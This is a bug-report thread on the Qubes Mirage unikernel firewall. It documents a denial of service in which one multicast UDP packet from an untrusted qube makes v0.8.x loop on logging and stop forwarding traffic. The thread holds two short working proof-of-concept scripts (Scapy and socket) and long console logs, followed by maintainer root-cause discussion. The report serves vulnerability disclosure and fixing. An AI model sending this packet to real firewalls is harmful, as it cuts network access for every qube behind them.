Mirage v0.8.x DoS from untrusted Qube by sending arbitrary UDP payload

[burghardt]

I used an mDNS fuzzer over the Mirage firewall and it run into problems resulting in DoS (99% CPU usage, stopped forwarding packets for all Qubes attached to the firewall instance).

Scapy output from fuzzer is quite verbose, but the minimalistic PoC is very simple.

###[ Ethernet ]### 
  dst       = 01:00:5e:7f:ff:fa
  src       = 00:16:3e:5e:6c:00
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 635
     id        = 53
     flags     = DF
     frag      = 0
     ttl       = 1
     proto     = udp
     chksum    = None
     src       = 10.137.0.24
     dst       = 239.255.255.250
     \options   \
###[ UDP ]### 
        sport     = 5353
        dport     = 5353
        len       = 615
        chksum    = None
###[ Raw ]### 
        load      = 'aaaaaaaaaa(...)aaa'

Here is Scapy PoC (minimalized by removing setup of unrelated fields):

#!/usr/bin/env python3

from scapy.all import IP,UDP,send

PAYLOAD = 'a' * 607

dgram = UDP(sport=5353, dport=5353)/PAYLOAD
pkt = IP(dst='239.255.255.250')/dgram
pkt.show()
send(pkt)

I translated this into BSD socket API to void the need for Scapy framework (and running PoC as root):

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))

The test setup was:
[Qube running PoC] -> [Mirage firewall] -> [Net Qube]

Tested Mirage firewall versions:
v0.7.1 - ok
v0.8.x - vulnerable

Version v0.7.1 prints this into the console while processing the packet:

2022-12-04 01:06:26 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 2608, off 16384 proto 17, ttl 1, options 
 UDP port 42669 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61)

And the output form v0.8.x loops printing packet details forever:

Solo5: Xen console: port 0x2, ring @0x00000000FEFFF000
            |      ___|
  __|  _ \  |  _ \ __ \
\__ \ (   | | (   |  ) |
____/\___/ _|\___/____/
Solo5: Bindings version v0.7.4
Solo5: Memory map: 32 MB addressable:
Solo5:   reserved @ (0x0 - 0xfffff)
Solo5:       text @ (0x100000 - 0x31bfff)
Solo5:     rodata @ (0x31c000 - 0x386fff)
Solo5:       data @ (0x387000 - 0x540fff)
Solo5:       heap >= 0x541000 < stack < 0x2000000
2022-12-04 01:20:07 -00:00: INF [qubes.rexec] waiting for client...
2022-12-04 01:20:07 -00:00: INF [qubes.db] connecting to server...
2022-12-04 01:20:07 -00:00: INF [qubes.db] connected
2022-12-04 01:20:07 -00:00: INF [qubes.db] got update: "/mapped-ip/10.137.0.24/visible-ip" = "10.137.0.24"
2022-12-04 01:20:07 -00:00: INF [qubes.db] got update: "/mapped-ip/10.137.0.24/visible-gateway" = "10.137.0.27"
2022-12-04 01:20:07 -00:00: INF [qubes.rexec] client connected, using protocol version 3
2022-12-04 01:20:07 -00:00: INF [unikernel] QubesDB and qrexec agents connected in 0.122 s
2022-12-04 01:20:07 -00:00: INF [dao] Got network configuration from QubesDB:
            NetVM IP on uplink network: 10.137.0.18
            Our IP on uplink network:   10.137.0.27
            Our IP on client networks:  10.137.0.27
            DNS primary resolver:       10.139.1.1
            DNS secondary resolver:     10.139.1.2
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] connect 0
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] create: id=0 domid=33
2022-12-04 01:20:07 -00:00: INF [net-xen frontend]  sg:true gso_tcpv4:true rx_copy:true rx_flip:false smart_poll:false
2022-12-04 01:20:07 -00:00: INF [net-xen frontend] MAC: 00:16:3e:5e:6c:00
2022-12-04 01:20:07 -00:00: INF [ethernet] Connected Ethernet interface 00:16:3e:5e:6c:00
2022-12-04 01:20:07 -00:00: INF [ARP] Sending gratuitous ARP for 10.137.0.27 (00:16:3e:5e:6c:00)
2022-12-04 01:20:07 -00:00: INF [ARP] Sending gratuitous ARP for 10.137.0.27 (00:16:3e:5e:6c:00)
2022-12-04 01:20:07 -00:00: INF [udp] UDP layer connected on 10.137.0.27
2022-12-04 01:20:07 -00:00: INF [dao] Watching backend/vif
2022-12-04 01:20:07 -00:00: INF [memory_pressure] Writing meminfo: free 20MiB / 27MiB (72.68 %)
2022-12-04 01:20:07 -00:00: WRN [uplink] Ignored unknown IPv4 message from uplink: Ignoring non-TCP/UDP packet: IPv4 packet 10.137.0.18 -> 224.0.0.22: id 0000, off 16384 proto 2, ttl 1, options 
94 04 00 00
2022-12-04 01:20:08 -00:00: INF [client_net] add client vif {domid=52;device_id=0} with IP 10.137.0.24
2022-12-04 01:20:08 -00:00: WRN [uplink] Ignored unknown IPv4 message from uplink: Ignoring non-TCP/UDP packet: IPv4 packet 10.137.0.18 -> 224.0.0.22: id 0000, off 16384 proto 2, ttl 1, options 
94 04 00 00
2022-12-04 01:20:08 -00:00: INF [client_net] Client 52 (IP: 10.137.0.24) ready
2022-12-04 01:20:08 -00:00: INF [ethernet] Connected Ethernet interface fe:ff:ff:ff:ff:ff
2022-12-04 01:20:08 -00:00: WRN [command] << Unknown command "QUBESRPC qubes.SetMonitorLayout dom0"
2022-12-04 01:20:08 -00:00: INF [client_eth:dom52:10.137.0.24] who-has 10.137.0.27? responding with fe:ff:ff:ff:ff:ff
2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61)
 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                              2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                2022-12-04 01:20:31 -00:00: WRN [firewall] Failed to add NAT rewrite rule: Cannot NAT this packet (IPv4 packet 10.137.0.24 -> 239.255.255.250: id 199a, off 16384 proto 17, ttl 1, options 
 UDP port 46475 -> 5353 with payload 61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
                                     61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
(...)

This issue seems to be unrelated to #158, as this happens with the following ruleset:

dom0 ~ $ qvm-firewall test-mirage-firewall list
NO  ACTION  HOST  PROTOCOL  PORT(S)  SPECIAL TARGET  ICMP TYPE  EXPIRE  COMMENT
0   accept  -     -         -        -               -          -       -

PoC demo on YouTube:

[hannesm]

Thanks for your report. Would you mind to clarify which qubes firewall image you used? Is it 0.8.2? Since in the latest, 0.8.3 (sha256 f499b2379c62917ac32854be63f201e6b90466e645e54dea51e376baccdf26ab), there are some fixes in these parts.

Thanks a lot!

[hannesm]

From reading some source code (sorry don't have my QubesOS laptop nearby), the destination address in the above mentioned IPv4 is in the multicast admin range (thus Ipaddr.scope returns Admin), and mirage-nat checks in nat_rewrite.ml function add whether both source and destination are in Global or Organization. If not, the `Cannot_NAT error is returned.

Now, from the terminal output it looks like we're seeing output from firewall.ml in function add_nat_and_forward_ipv4, which before 0.7.1 used pp_header, and now Nat_packet.pp (87df5bd#diff-ec9fe4e557558e9f9cb06c4011300f8bdf4fa73809d7202f11d2a0119b34dff9L118) (which shouldn't make a difference). There's some broken log output (after the first dump, a closing parenthesis is present ), but afterwards some more hexdump is present, and the next log messages are indented).

Would you mind to test with some smaller packets (atm the UDP payload is 607 bytes, does it also fail with fewer bytes?) - it may be related to fragmentation and reassembly (though MTU should be ~1500).

[haesbaert]

Just a note, mdns is the link local multicast range, and should not be natted or forwarded between IP two networks.

…

